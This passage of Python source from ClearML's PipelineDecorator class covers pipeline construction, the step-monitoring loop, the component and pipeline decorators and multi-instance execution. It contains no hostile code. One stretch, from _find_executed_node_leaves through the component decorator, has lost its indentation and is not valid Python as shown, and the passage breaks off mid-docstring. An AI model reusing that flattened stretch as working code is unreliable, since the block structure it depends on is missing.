# bookkeeping for multi-pipeline support and atexit registration
_multi_pipeline_instances = []
_atexit_registered = False
def __init__(
        self,
        name,  # type: str
        project,  # type: str
        version,  # type: str
        pool_frequency=0.2,  # type: float
        add_pipeline_tags=False,  # type: bool
        target_project=None,  # type: Optional[str]
        abort_on_failure=False,  # type: bool
):
    # type: (...) -> ()
    """
    Create a new pipeline controller. The newly created object will launch and monitor the new experiments.

    :param name: Provide pipeline name (if main Task exists it overrides its name)
    :param project: Provide project storing the pipeline (if main Task exists it overrides its project)
    :param version: Must provide pipeline version. This version allows to uniquely identify the pipeline
        template execution. Examples for semantic versions: version='1.0.1' , version='23', version='1.2'
    :param float pool_frequency: The pooling frequency (in minutes) for monitoring experiments / states.
    :param bool add_pipeline_tags: (default: False) if True, add `pipe: <pipeline_task_id>` tag to all
        steps (Tasks) created by this pipeline.
    :param str target_project: If provided, all pipeline steps are cloned into the target project
    :param bool abort_on_failure: If False (default), failed pipeline steps will not cause the pipeline
        to stop immediately, instead any step that is not connected (or indirectly connected) to the failed step,
        will still be executed. Nonetheless the pipeline itself will be marked failed, unless the failed step
        was specifically defined with "continue_on_fail=True".
        If True, any failed step will cause the pipeline to immediately abort, stop all running steps,
        and mark the pipeline as failed.
    """
    super(PipelineDecorator, self).__init__(
        name=name,
        project=project,
        version=version,
        pool_frequency=pool_frequency,
        add_pipeline_tags=add_pipeline_tags,
        target_project=target_project,
        abort_on_failure=abort_on_failure,
    )

    # if we are in eager execution, make sure parent class knows it
    if self._eager_execution_instance:
        self._mock_execution = True

    if PipelineDecorator._default_execution_queue:
        super(PipelineDecorator, self).set_default_execution_queue(
            PipelineDecorator._default_execution_queue)

    # register all steps that were declared with @component before this
    # controller existed, then clear the shared pending list
    for n in self._added_decorator:
        self.add_function_step(**n)
    self._added_decorator.clear()
    PipelineDecorator._singleton = self
    self._reference_callback = []
    # map eager steps task id to the new step name
    self._eager_steps_task_id = {}  # type: Dict[str, str]
def _daemon(self):
    # type: () -> ()
    """
    The main pipeline execution loop. This loop is executed on its own dedicated thread.
    override the daemon function, we only need to update the state

    Unlike the base class, this loop does NOT launch new steps (decorated
    steps launch themselves); it only tracks job completion, fires callbacks,
    and keeps the stored configuration and plot up to date.
    :return:
    """
    pooling_counter = 0
    launched_nodes = set()
    last_monitor_report = last_plot_report = time()
    while self._stop_event:
        # stop request (first iteration uses a very short wait so startup is responsive)
        if self._stop_event.wait(self._pool_frequency if pooling_counter else 0.01):
            break

        pooling_counter += 1

        # check the pipeline time limit
        if self._pipeline_time_limit and (time() - self._start_time) > self._pipeline_time_limit:
            break

        # check the state of all current jobs
        # if no a job ended, continue
        completed_jobs = []
        nodes_failed_stop_pipeline = []
        force_execution_plot_update = False
        for j in self._running_nodes:
            node = self._nodes[j]
            if not node.job:
                continue
            if node.job.is_stopped():
                completed_jobs.append(j)
                node_failed = node.job.is_failed()
                # executed holds the task id on success, False on failure
                node.executed = node.job.task_id() if not node_failed else False
                if j in launched_nodes:
                    launched_nodes.remove(j)
                # check if we need to stop all running steps
                if node_failed and self._abort_running_steps_on_failure and not node.continue_on_fail:
                    nodes_failed_stop_pipeline.append(node.name)
            elif node.timeout:
                # abort a step that exceeded its per-node timeout (measured from Task start time)
                started = node.job.task.data.started
                if (datetime.now().astimezone(started.tzinfo) - started).total_seconds() > node.timeout:
                    node.job.abort()
                    completed_jobs.append(j)
                    node.executed = node.job.task_id()
            elif j in launched_nodes and node.job.is_running():
                # make sure update the execution graph when the job started running
                # (otherwise it will still be marked queued)
                launched_nodes.remove(j)
                force_execution_plot_update = True

        # update running jobs
        self._running_nodes = [j for j in self._running_nodes if j not in completed_jobs]

        # nothing changed, we can sleep
        if not completed_jobs and self._running_nodes:
            # force updating the pipeline state (plot) at least every 5 min.
            if force_execution_plot_update or time()-last_plot_report > self._update_execution_plot_interval:
                last_plot_report = time()
                last_monitor_report = time()
                self.update_execution_plot()
            elif time()-last_monitor_report > self._monitor_node_interval:
                # between plot refreshes, periodically pull monitored metrics/artifacts/models
                last_monitor_report = time()
                self._scan_monitored_nodes()
            continue

        # callback on completed jobs
        if self._experiment_completed_cb or self._post_step_callbacks:
            for job in completed_jobs:
                job_node = self._nodes.get(job)
                if not job_node:
                    continue
                if self._experiment_completed_cb:
                    self._experiment_completed_cb(self, job_node)
                if self._post_step_callbacks.get(job_node.name):
                    self._post_step_callbacks[job_node.name](self, job_node)

        # check if we need to stop the pipeline, and abort all running steps
        if nodes_failed_stop_pipeline:
            print('Aborting pipeline and stopping all running steps, node {} failed'.format(
                nodes_failed_stop_pipeline))
            break

        # update current state (in configuration, so that we could later continue an aborted pipeline)
        self._force_task_configuration_update()

        # visualize pipeline state (plot)
        self.update_execution_plot()

    # stop all currently running jobs, protect against changes while iterating):
    for node in list(self._nodes.values()):
        if node.executed is False and not node.continue_on_fail:
            # executed is False only when a step failed - mark the whole pipeline failed
            self._pipeline_task_status_failed = True

        if node.job and not node.job.is_stopped():
            node.job.abort()
        elif not node.job and not node.executed:
            # mark Node as skipped if it has no Job object and it is not executed
            node.skip_job = True

            # if this is a standalone node, we need to remove it from the graph
            if not node.parents:
                # check if this node is anyone's parent
                found_parent = False
                for v in list(self._nodes.values()):
                    if node.name in (v.parents or []):
                        found_parent = True
                        break
                if not found_parent:
                    self._nodes.pop(node.name, None)

    # visualize pipeline state (plot)
    self.update_execution_plot()

    if self._stop_event:
        # noinspection PyBroadException
        try:
            self._stop_event.set()
        except Exception:
            pass
def update_execution_plot(self):
    # type: () -> ()
    """
    Update sankey diagram of the current pipeline

    First fold any eagerly generated steps (reported as artifacts by running
    steps) into the DAG, then delegate the actual plotting to the base class.
    """
    self._update_eager_generated_steps()
    super(PipelineDecorator, self).update_execution_plot()
def _update_eager_generated_steps(self):
    # type: () -> None
    """
    Fold eagerly generated steps into the pipeline DAG.

    Running steps report new (eager) sub-steps by adding artifacts named
    '<_eager_step_artifact>:<parent-task-id>:<eager-task-id>' whose preview
    holds the serialized node definition. Each such artifact is turned into a
    new Node (child of the reporting step) and then deleted from the Task.
    """
    # noinspection PyProtectedMember
    self._task.reload()
    artifacts = self._task.data.execution.artifacts
    # check if we have a new step on the DAG
    eager_artifacts = []
    for a in artifacts:
        if a.key and a.key.startswith('{}:'.format(self._eager_step_artifact)):
            # expected value: '"eager_step":"parent-node-task-id":"eager-step-task-id'
            eager_artifacts.append(a)

    # verify we have the step, if we do not, add it.
    delete_artifact_keys = []
    for artifact in eager_artifacts:
        _, parent_step_task_id, eager_step_task_id = artifact.key.split(':', 2)

        # deserialize node definition
        eager_node_def = json.loads(artifact.type_data.preview)
        eager_node_name, eager_node_def = list(eager_node_def.items())[0]

        # verify we do not have any new nodes on the DAG (i.e. a step generating a Node eagerly)
        parent_node = None
        for node in list(self._nodes.values()):
            if not node.job and not node.executed:
                continue
            t_id = node.executed or node.job.task_id
            if t_id == parent_step_task_id:
                parent_node = node
                break

        if not parent_node:
            # should not happen
            continue

        # generate a unique name for the new step: "<parent>_<eager-name>[_<counter>]"
        new_step_node_name = '{}_{}'.format(parent_node.name, eager_node_name)
        counter = 1
        while new_step_node_name in self._nodes:
            new_step_node_name = '{}_{}'.format(new_step_node_name, counter)
            counter += 1
        eager_node_def['name'] = new_step_node_name
        eager_node_def['parents'] = [parent_node.name]
        is_cached = eager_node_def.pop('is_cached', None)
        self._nodes[new_step_node_name] = self.Node(**eager_node_def)
        # attach a job wrapping the already-running eager Task
        self._nodes[new_step_node_name].job = RunningJob(existing_task=eager_step_task_id)
        if is_cached:
            self._nodes[new_step_node_name].job.force_set_is_cached(is_cached)

        # make sure we will not rescan it.
        delete_artifact_keys.append(artifact.key)

    # remove all processed eager step artifacts
    if delete_artifact_keys:
        # noinspection PyProtectedMember
        self._task._delete_artifacts(delete_artifact_keys)
        self._force_task_configuration_update()
def _create_task_from_function(
        self, docker, docker_args, docker_bash_setup_script,
        function, function_input_artifacts, function_kwargs, function_return,
        packages, project_name, task_name, task_type, repo, branch, commit,
        helper_functions,
):
    """
    Build a dry-run Task definition dict for a pipeline-step function, stripping
    the @PipelineDecorator.component(...) decorator from the captured source.

    :param function: the step function to convert into a standalone Task
    :return: Task definition dict as produced by CreateFromFunction (dry_run=True)
    """
    def sanitize(function_source):
        # remove the leading "@PipelineDecorator.component(...)" decorator
        # from the captured function source, if present
        matched = re.match(r"[\s]*@PipelineDecorator.component[\s\\]*\(", function_source)
        if matched:
            function_source = function_source[matched.span()[1]:]
            # find the last ")"
            open_parenthesis = 0
            last_index = -1
            # scan for the ')' that closes the decorator call (depth 0)
            for i, c in enumerate(function_source):
                if not open_parenthesis and c == ')':
                    last_index = i
                    break
                elif c == ')':
                    open_parenthesis -= 1
                elif c == '(':
                    open_parenthesis += 1
            if last_index >= 0:
                function_source = function_source[last_index+1:].lstrip()
        return function_source

    task_definition = CreateFromFunction.create_task_from_function(
        a_function=function,
        function_kwargs=function_kwargs or None,
        function_input_artifacts=function_input_artifacts,
        function_return=function_return,
        project_name=project_name,
        task_name=task_name,
        task_type=task_type,
        repo=repo,
        branch=branch,
        commit=commit,
        packages=packages,
        docker=docker,
        docker_args=docker_args,
        docker_bash_setup_script=docker_bash_setup_script,
        output_uri=None,
        helper_functions=helper_functions,
        dry_run=True,
        _sanitize_function=sanitize,
    )
    return task_definition
def _find_executed_node_leaves(self):
# type: () -> List[PipelineController.Node]
all_parents = set([p for n in list(self._nodes.values()) if n.executed for p in n.parents])
executed_leaves = [name for name, n in list(self._nodes.items()) if n.executed and name not in all_parents]
return executed_leaves
def _adjust_task_hashing(self, task_hash):
# type: (dict) -> dict
"""
Fix the Task hashing so that parameters pointing to the current Task artifact are encoded using the
hash content of the artifact, instead of the Task.id
:param task_hash: Task representation dict
:return: Adjusted Task representation dict
"""
if task_hash.get('hyper_params'):
updated_params = {}
for k, v in task_hash['hyper_params'].items():
if k.startswith("{}/".format(CreateFromFunction.input_artifact_section)) and \
str(v).startswith("{}.".format(self._task.id)):
task_id, artifact_name = str(v).split(".", 1)
if artifact_name in self._task.artifacts:
updated_params[k] = self._task.artifacts[artifact_name].hash
task_hash['hyper_params'].update(updated_params)
return task_hash
@classmethod
def component(
cls,
_func=None, *,
return_values=('return_object', ), # type: Union[str, List[str]]
name=None, # type: Optional[str]
cache=False, # type: bool
packages=None, # type: Optional[Union[str, Sequence[str]]]
parents=None, # type: Optional[List[str]]
execution_queue=None, # type: Optional[str]
continue_on_fail=False, # type: bool
docker=None, # type: Optional[str]
docker_args=None, # type: Optional[str]
docker_bash_setup_script=None, # type: Optional[str]
task_type=None, # type: Optional[str]
repo=None, # type: Optional[str]
repo_branch=None, # type: Optional[str]
repo_commit=None, # type: Optional[str]
helper_functions=None, # type: Optional[Sequence[Callable]]
monitor_metrics=None, # type: Optional[List[Union[Tuple[str, str], Tuple[(str, str), (str, str)]]]]
monitor_artifacts=None, # type: Optional[List[Union[str, Tuple[str, str]]]]
monitor_models=None # type: Optional[List[Union[str, Tuple[str, str]]]]
):
# type: (...) -> Callable
"""
pipeline component function to be executed remotely
:param _func: wrapper function
:param return_values: Provide a list of names for all the results.
Notice! If not provided no results will be stored as artifacts.
:param name: Optional, set the name of the pipeline component task.
If not provided, the wrapped function name is used as the pipeline component name
:param cache: If True, before launching the new step,
after updating with the latest configuration, check if an exact Task with the same parameter/code
was already executed. If it was found, use it instead of launching a new Task. Default: False
:param packages: Manually specify a list of required packages or a local requirements.txt file.
Example: ["tqdm>=2.1", "scikit-learn"] or "./requirements.txt"
If not provided, packages are automatically added based on the imports used inside the wrapped function.
:param parents: Optional list of parent nodes in the DAG.
The current step in the pipeline will be sent for execution only after all the parent nodes
have been executed successfully.
:param execution_queue: Optional, the queue to use for executing this specific step.
If not provided, the task will be sent to the pipeline's default execution queue
:param continue_on_fail: (default False). If True, a failed step will not cause the pipeline to stop
(or marked as failed). Notice, that steps that are connected (or indirectly connected)
to the failed step will be skipped.
:param docker: Specify the docker image to be used when executing the pipeline step remotely
:param docker_args: Add docker execution arguments for the remote execution
(use single string for all docker arguments).
:param docker_bash_setup_script: Add a bash script to be executed inside the docker before
setting up the Task's environment
:param task_type: Optional, The task type to be created. Supported values: 'training', 'testing', 'inference',
'data_processing', 'application', 'monitor', 'controller', 'optimizer', 'service', 'qc', 'custom'
:param repo: Optional, specify a repository to attach to the function, when remotely executing.
Allow users to execute the function inside the specified repository, enabling them to load modules/script
from the repository. Notice the execution work directory will be the repository root folder.
Supports both git repo url link, and local repository path (automatically converted into the remote
git/commit as is currently checkout).
Example remote url: 'https://github.com/user/repo.git'
Example local repo copy: './repo' -> will automatically store the remote
repo url and commit ID based on the locally cloned copy
:param repo_branch: Optional, specify the remote repository branch (Ignored, if local repo path is used)
:param repo_commit: Optional, specify the repository commit id (Ignored, if local repo path is used)
:param helper_functions: Optional, a list of helper functions to make available
for the standalone pipeline step function Task. By default the pipeline step function has
no access to any of the other functions, by specifying additional functions here, the remote pipeline step
could call the additional functions.
Example, assuming we have two functions parse_data(), and load_data(): [parse_data, load_data]
:param monitor_metrics: Optional, Automatically log the step's reported metrics also on the pipeline Task.
The expected format is a list of pairs metric (title, series) to log:
[(step_metric_title, step_metric_series), ]
Example: [('test', 'accuracy'), ]
Or a list of tuple pairs, to specify a different target metric to use on the pipeline Task:
[((step_metric_title, step_metric_series), (target_metric_title, target_metric_series)), ]
Example: [[('test', 'accuracy'), ('model', 'accuracy')], ]
:param monitor_artifacts: Optional, Automatically log the step's artifacts on the pipeline Task.
Provided a list of artifact names created by the step function, these artifacts will be logged
automatically also on the Pipeline Task itself.
Example: ['processed_data', ]
(target artifact name on the Pipeline Task will hav ethe same name as the original artifact)
Alternatively, provide a list of pairs (source_artifact_name, target_artifact_name):
where the first string is the artifact name as it appears on the component Task,
and the second is the target artifact name to put on the Pipeline Task
Example: [('processed_data', 'final_processed_data'), ]
:param monitor_models: Optional, Automatically log the step's output models on the pipeline Task.
Provided a list of model names created by the step's Task, they will also appear on the Pipeline itself.
Example: ['model_weights', ]
To select the latest (lexicographic) model use "model_*", or the last created model with just "*"
Example: ['model_weights_*', ]
Alternatively, provide a list of pairs (source_model_name, target_model_name):
where the first string is the model name as it appears on the component Task,
and the second is the target model name to put on the Pipeline Task
Example: [('model_weights', 'final_model_weights'), ]
:return: function wrapper
"""
def decorator_wrap(func):
_name = name or str(func.__name__)
function_return = return_values if isinstance(return_values, (tuple, list)) else [return_values]
inspect_func = inspect.getfullargspec(func)
# add default argument values
if inspect_func.args:
default_values = list(inspect_func.defaults or [])
default_values = ([None] * (len(inspect_func.args)-len(default_values))) + default_values
function_kwargs = {k: v for k, v in zip(inspect_func.args, default_values)}
else:
function_kwargs = dict()
add_step_spec = dict(
name=_name,
function=func,
function_kwargs=function_kwargs,
function_return=function_return,
cache_executed_step=cache,
packages=packages,
parents=parents,
execution_queue=execution_queue,
continue_on_fail=continue_on_fail,
docker=docker,
docker_args=docker_args,
docker_bash_setup_script=docker_bash_setup_script,
task_type=task_type,
repo=repo,
repo_branch=repo_branch,
repo_commit=repo_commit,
helper_functions=helper_functions,
monitor_metrics=monitor_metrics,
monitor_models=monitor_models,
monitor_artifacts=monitor_artifacts,
)
if cls._singleton:
cls._singleton.add_function_step(**add_step_spec)
else:
cls._added_decorator.append(add_step_spec)
@functools.wraps(func)
def wrapper(*args, **kwargs):
if cls._debug_execute_step_function:
args = [v._remoteref() if isinstance(v, LazyEvalWrapper) else v for v in args]
kwargs = {k: v._remoteref() if isinstance(v, LazyEvalWrapper) else v for k, v in kwargs.items()}
func_return = []
def result_wrapper(a_func_return, return_index):
if not a_func_return:
a_func_return.append(func(*args, **kwargs))
a_func_return = a_func_return[0]
return a_func_return if return_index is None else a_func_return[return_index]
if len(function_return) == 1:
return LazyEvalWrapper(
callback=functools.partial(result_wrapper, func_return, None),
remote_reference=functools.partial(result_wrapper, func_return, None))
else:
return_w = [LazyEvalWrapper(
callback=functools.partial(result_wrapper, func_return, i),
remote_reference=functools.partial(result_wrapper, func_return, i))
for i, _ in enumerate(function_return)]
return return_w
# resolve all lazy objects if we have any:
kwargs_artifacts = {}
for i, v in enumerate(args):
kwargs[inspect_func.args[i]] = v
kwargs_artifacts.update(
{k: v._remoteref() for k, v in kwargs.items() if isinstance(v, LazyEvalWrapper)}
)
kwargs = {k: v for k, v in kwargs.items() if not isinstance(v, LazyEvalWrapper)}
# check if we have the singleton
if not cls._singleton:
# todo: somehow make sure the generated tasks list the parent pipeline as parent
original_tags = Task.current_task().get_tags(), Task.current_task().get_system_tags()
# This is an adhoc pipeline step,
PipelineDecorator._eager_execution_instance = True
a_pipeline = PipelineDecorator(
name=name,
project='DevOps', # it will not actually be used
version='0.0.0',
pool_frequency=111,
add_pipeline_tags=False,
target_project=None,
)
target_queue = \
PipelineDecorator._default_execution_queue or \
Task.current_task().data.execution.queue
if target_queue:
PipelineDecorator.set_default_execution_queue(target_queue)
else:
# if we are are not running from a queue, we are probably in debug mode
a_pipeline._clearml_job_class = LocalClearmlJob
a_pipeline._default_execution_queue = 'mock'
# restore tags, the pipeline might add a few
Task.current_task().set_tags(original_tags[0])
Task.current_task().set_system_tags(original_tags[1])
# get original node name
_node_name = _name
# get node
_node = cls._singleton._nodes[_node_name]
# if we already have a JOB on the node, this means we are calling the same function/task
# twice inside the pipeline, this means we need to replicate the node.
if _node.job:
_node = _node.copy()
# find a new name
counter = 1
while _node.name in cls._singleton._nodes:
_node.name = '{}_{}'.format(_node_name, counter)
counter += 1
_node_name = _node.name
cls._singleton._nodes[_node.name] = _node
# update artifacts kwargs
for k, v in kwargs_artifacts.items():
if k in kwargs:
kwargs.pop(k, None)
_node.parameters["{}/{}".format(CreateFromFunction.input_artifact_section, k)] = v
if v and '.' in str(v):
parent_id, _ = str(v).split('.', 1)
# find parent and push it into the _node.parents
for n, node in cls._singleton._nodes.items():
if n != _node.name and node.executed and node.executed == parent_id:
if n not in _node.parents:
_node.parents.append(n)
break
for k, v in kwargs.items():
if v is None or isinstance(v, (bool, int, float, str)):
_node.parameters["{}/{}".format(CreateFromFunction.kwargs_section, k)] = v
elif isinstance(v, (list, tuple)) and all(isinstance(i, (bool, int, float, str)) for i in v):
_node.parameters["{}/{}".format(CreateFromFunction.kwargs_section, k)] = v
else:
# we need to create an artifact
artifact_name = 'result_{}_{}'.format(re.sub(r'\W+', '', _node.name), k)
cls._singleton._task.upload_artifact(
name=artifact_name, artifact_object=v, wait_on_upload=True)
_node.parameters["{}/{}".format(CreateFromFunction.input_artifact_section, k)] = \
"{}.{}".format(cls._singleton._task.id, artifact_name)
# now add all the executed nodes as parents (only the leaves of the DAG, no need for parents)
_node.parents = list(
set((_node.parents or []) + cls._singleton._find_executed_node_leaves())
- set(list(_node.name)))
# verify the new step
cls._singleton._verify_node(_node)
# launch the new step
cls._singleton._launch_node(_node)
# check if we generated the pipeline we need to update the new eager step
if PipelineDecorator._eager_execution_instance and _node.job:
# check if we need to add the pipeline tag on the new node
pipeline_tags = [t for t in Task.current_task().get_tags() or []
if str(t).startswith(cls._node_tag_prefix)]
if pipeline_tags and _node.job and _node.job.task:
pipeline_tags = list(set((_node.job.task.get_tags() or []) + pipeline_tags))
_node.job.task.set_tags(pipeline_tags)
# force parent task as pipeline
_node.job.task._edit(parent=Task.current_task().parent)
# store the new generated node, so we can later serialize it
pipeline_dag = cls._singleton._serialize()
# check if node is cached
if _node.job.is_cached_task():
pipeline_dag[_node_name]['is_cached'] = True
# store entire definition on the parent pipeline
from clearml.backend_api.services import tasks
artifact = tasks.Artifact(
key='{}:{}:{}'.format(cls._eager_step_artifact, Task.current_task().id, _node.job.task_id()),
type="json",
mode='output',
type_data=tasks.ArtifactTypeData(
preview=json.dumps({_node_name: pipeline_dag[_node_name]}),
content_type='application/pipeline')
)
req = tasks.AddOrUpdateArtifactsRequest(
task=Task.current_task().parent, artifacts=[artifact], force=True)
res = Task.current_task().send(req, raise_on_errors=False)
if not res or not res.response or not res.response.updated:
pass
def results_reference(return_name):
# wait until job is completed
_node.job.wait(pool_period=0.2)
if _node.job.is_failed() and not _node.continue_on_fail:
raise ValueError(
'Pipeline step "{}", Task ID={} failed'.format(_node.name, _node.job.task_id()))
_node.executed = _node.job.task_id()
return "{}.{}".format(_node.job.task_id(), return_name)
def result_wrapper(return_name):
# wait until job is completed
_node.job.wait(pool_period=0.2)
if _node.job.is_failed():
raise ValueError(
'Pipeline step "{}", Task ID={} failed'.format(_node.name, _node.job.task_id()))
_node.executed = _node.job.task_id()
return Task.get_task(_node.job.task_id()).artifacts[return_name].get()
return_w = [LazyEvalWrapper(
callback=functools.partial(result_wrapper, n),
remote_reference=functools.partial(results_reference, n)) for n in function_return]
return return_w[0] if len(return_w) == 1 else return_w
return wrapper
return decorator_wrap if _func is None else decorator_wrap(_func)
@classmethod
def pipeline(
        cls,
        _func=None, *,  # noqa
        name,  # type: str
        project,  # type: str
        version,  # type: str
        return_value=None,  # type: Optional[str]
        default_queue=None,  # type: Optional[str]
        pool_frequency=0.2,  # type: float
        add_pipeline_tags=False,  # type: bool
        target_project=None,  # type: Optional[str]
        abort_on_failure=False,  # type: bool
        pipeline_execution_queue='services',  # type: Optional[str]
        multi_instance_support=False
):
    # type: (...) -> Callable
    """
    Decorate pipeline logic function.

    :param name: Provide pipeline name (if main Task exists it overrides its name)
    :param project: Provide project storing the pipeline (if main Task exists it overrides its project)
    :param version: Must provide pipeline version. This version allows to uniquely identify the pipeline
        template execution. Examples for semantic versions: version='1.0.1' , version='23', version='1.2'
    :param return_value: Optional, Provide an artifact name to store the pipeline function return object
        Notice, If not provided the pipeline will not store the pipeline function return value.
    :param default_queue: default pipeline step queue
    :param float pool_frequency: The pooling frequency (in minutes) for monitoring experiments / states.
    :param bool add_pipeline_tags: (default: False) if True, add `pipe: <pipeline_task_id>` tag to all
        steps (Tasks) created by this pipeline.
    :param str target_project: If provided, all pipeline steps are cloned into the target project
    :param bool abort_on_failure: If False (default), failed pipeline steps will not cause the pipeline
        to stop immediately, instead any step that is not connected (or indirectly connected) to the failed step,
        will still be executed. Nonetheless the pipeline itself will be marked failed, unless the failed step
        was specifically defined with "continue_on_fail=True".
        If True, any failed step will cause the pipeline to immediately abort, stop all running steps,
        and mark the pipeline as failed.
    :param pipeline_execution_queue: remote pipeline execution queue (default 'services' queue).
        If None is passed, execute the pipeline logic locally (pipeline steps are still executed remotely)
    :param multi_instance_support: If True, allow multiple calls to the same pipeline function,
        each call creating a new Pipeline Task. Notice it is recommended to create an additional Task on the
        "main process" acting as a master pipeline, automatically collecting the execution plots.
        If multi_instance_support=='parallel' then the pipeline calls are executed in parallel,
        in the `parallel` case the function calls return None, to collect all pipeline results call
        `PipelineDecorator.wait_for_multi_pipelines()`.
        Default False, no multi instance pipeline support.
    """
    def decorator_wrap(func):

        def internal_decorator(*args, **kwargs):
            # normalize keyword arguments, then fold positional args in by name
            pipeline_kwargs = dict(**(kwargs or {}))
            inspect_func = inspect.getfullargspec(func)
            if args:
                if not inspect_func.args:
                    raise ValueError("Could not parse function arguments")
                pipeline_kwargs.update({inspect_func.args[i]: v for i, v in enumerate(args)})

            # add default function arguments if we have defaults for all arguments
            if inspect_func.args:
                default_values = list(inspect_func.defaults or [])
                # left-pad with None so defaults align with the trailing parameters
                default_values = ([None] * (len(inspect_func.args) - len(default_values))) + default_values
                default_kwargs = {k: v for k, v in zip(inspect_func.args, default_values)}
                default_kwargs.update(pipeline_kwargs)
                pipeline_kwargs = default_kwargs

            # run the entire pipeline locally, as python functions (debug mode)
            if cls._debug_execute_step_function:
                ret_val = func(**pipeline_kwargs)
                LazyEvalWrapper.trigger_all_remote_references()
                return ret_val

            if default_queue:
                cls.set_default_execution_queue(default_queue)

            a_pipeline = PipelineDecorator(
                name=name,
                project=project,
                version=version,
                pool_frequency=pool_frequency,
                add_pipeline_tags=add_pipeline_tags,
                target_project=target_project,
                abort_on_failure=abort_on_failure,
            )

            if PipelineDecorator._debug_execute_step_process:
                # local debug: run steps as local jobs on a mock queue
                a_pipeline._clearml_job_class = LocalClearmlJob
                a_pipeline._default_execution_queue = 'mock'

            a_pipeline._clearml_job_class.register_hashing_callback(a_pipeline._adjust_task_hashing)

            # add pipeline arguments
            if pipeline_kwargs:
                a_pipeline.get_parameters().update(pipeline_kwargs)

            # serialize / deserialize state only if we are running locally
            a_pipeline._start(wait=False)

            # sync arguments back (remote execution may have overridden them via the UI)
            for k in pipeline_kwargs.keys():
                if k in a_pipeline.get_parameters():
                    pipeline_kwargs[k] = a_pipeline.get_parameters()[k]

            # run the actual pipeline
            if not PipelineDecorator._debug_execute_step_process and pipeline_execution_queue:
                # rerun the pipeline on a remote machine
                a_pipeline._task.execute_remotely(queue_name=pipeline_execution_queue)
                # when we get here it means we are running remotely

            # this time the pipeline is executed only on the remote machine
            try:
                pipeline_result = func(**pipeline_kwargs)
            except Exception:
                a_pipeline.stop(mark_failed=True)
                raise

            # resolving lazy step results may raise; remember it, but first
            # wait for all launched nodes so nothing is left running
            triggered_exception = None
            try:
                LazyEvalWrapper.trigger_all_remote_references()
            except Exception as ex:
                triggered_exception = ex

            # make sure we wait for all nodes to finish
            waited = True
            while waited:
                waited = False
                for node in list(a_pipeline._nodes.values()):
                    if node.executed or not node.job or node.job.is_stopped():
                        continue
                    node.job.wait(pool_period=15)
                    waited = True

            # store the pipeline result if we have any
            if return_value and pipeline_result is not None:
                a_pipeline._task.upload_artifact(
                    name=str(return_value), artifact_object=pipeline_result, wait_on_upload=True
                )

            # now we can stop the pipeline
            a_pipeline.stop()
            # now we can raise the exception
            if triggered_exception:
                raise triggered_exception
            return pipeline_result

        if multi_instance_support:
            return cls._multi_pipeline_wrapper(
                func=internal_decorator, parallel=bool(multi_instance_support == 'parallel'))

        return internal_decorator

    # support both @pipeline and @pipeline(...) usages
    return decorator_wrap if _func is None else decorator_wrap(_func)
@classmethod
def set_default_execution_queue(cls, default_execution_queue):
    # type: (Optional[str]) -> None
    """
    Define the fallback execution queue used by pipeline steps that do not
    name a queue of their own.

    :param default_execution_queue: Queue name to fall back to. A falsy
        value clears the default.
    """
    if default_execution_queue:
        cls._default_execution_queue = str(default_execution_queue)
    else:
        cls._default_execution_queue = None
@classmethod
def run_locally(cls):
    # type: () -> ()
    """
    Run the full pipeline DAG on this machine, executing every step as a
    sub-process Task (not as a plain function).

    Notice: local DAG execution assumes the local code is the code to run
    (it will not clone the repo nor apply a git diff).
    """
    cls._debug_execute_step_function = False
    cls._debug_execute_step_process = True
@classmethod
def debug_pipeline(cls):
    # type: () -> ()
    """
    Enable debugging mode: run the full pipeline DAG locally, with every
    step invoked as a plain Python function (no Task objects are created),
    for ease of debugging.

    Notice: local DAG execution assumes the local code is the code to run
    (it will not clone the repo nor apply a git diff).
    """
    cls._debug_execute_step_function = True
    cls._debug_execute_step_process = True
@classmethod
def _multi_pipeline_wrapper(
        cls,
        func=None,  # type: Callable
        parallel=False,  # type: bool
):
    # type: (...) -> Callable
    """
    Add support for multiple pipeline function calls,
    enabling execution of multiple instances of the same pipeline from a single script.

    .. code-block:: python

        @PipelineDecorator.pipeline(
            multi_instance_support=True, name="custom pipeline logic", project="examples", version="1.0")
        def pipeline(parameter=1):
            print(f"running with parameter={parameter}")

        # run both pipelines (if multi_instance_support=='parallel', run pipelines in parallel)
        pipeline(parameter=1)
        pipeline(parameter=2)

    :param func: The (already decorated) pipeline entry function to wrap.
    :param parallel: If True, the pipeline is running in the background, which implies calling
        the pipeline twice means running the pipelines in parallel.
        Default: False, pipeline function returns when pipeline completes
    :return: Return wrapped pipeline function.
        Notice the return value of the pipeline wrapped function:
        if parallel==True, return will be None, otherwise expect the return of the pipeline wrapped function
    """
    def internal_decorator(*args, **kwargs):
        # if this is a debug run just call the function (no parallelization).
        if cls._debug_execute_step_function:
            return func(*args, **kwargs)

        def sanitized_env(a_queue, *a_args, **a_kwargs):
            # Runs inside the child process: drop any inherited ClearML /
            # Trains process state so the pipeline creates its own Task.
            os.environ.pop('CLEARML_PROC_MASTER_ID', None)
            os.environ.pop('TRAINS_PROC_MASTER_ID', None)
            os.environ.pop('CLEARML_TASK_ID', None)
            os.environ.pop('TRAINS_TASK_ID', None)
            if Task.current_task():
                # noinspection PyProtectedMember
                Task.current_task()._reset_current_task_obj()
            a_result = func(*a_args, **a_kwargs)
            if a_queue is not None:
                # report (task_id, result) back to the parent process
                task_id = Task.current_task().id if Task.current_task() else None
                a_queue.put((task_id, a_result))
            return a_result

        queue = Queue()
        p = Process(target=sanitized_env, args=(queue, ) + args, kwargs=kwargs)
        # make sure we wait for the subprocess (non-daemonic).
        p.daemon = False
        p.start()
        if parallel:
            # background mode: remember the (process, queue) pair; results are
            # collected later by wait_for_multi_pipelines() / atexit hook
            cls._multi_pipeline_instances.append((p, queue))
            return
        else:
            p.join()
            # noinspection PyBroadException
            try:
                pipeline_task, result = queue.get_nowait()
            except Exception:
                # child died or never reported -> no result
                return None
            # we should update the master Task plot:
            if pipeline_task and Task.current_task():
                cls._add_pipeline_plots(pipeline_task)
            return result

    if parallel and not cls._atexit_registered:
        # make sure background pipelines are collected even if the caller forgets
        cls._atexit_registered = True
        atexit.register(cls._wait_for_multi_pipelines)
    return internal_decorator
@classmethod
def get_current_pipeline(cls):
    # type: () -> "PipelineDecorator"
    """
    Return the pipeline controller instance currently executing (the singleton).
    """
    active_pipeline = cls._singleton
    return active_pipeline
@classmethod
def wait_for_multi_pipelines(cls):
    # type: () -> List[Any]
    """
    Block until every background (multi-instance) pipeline has completed.

    :return: The pipeline return values, ordered by the original call order
        (the first pipeline call is at index 0).
    """
    return cls._wait_for_multi_pipelines()
@classmethod
def _wait_for_multi_pipelines(cls):
    """
    Join every background pipeline subprocess, collect their results in
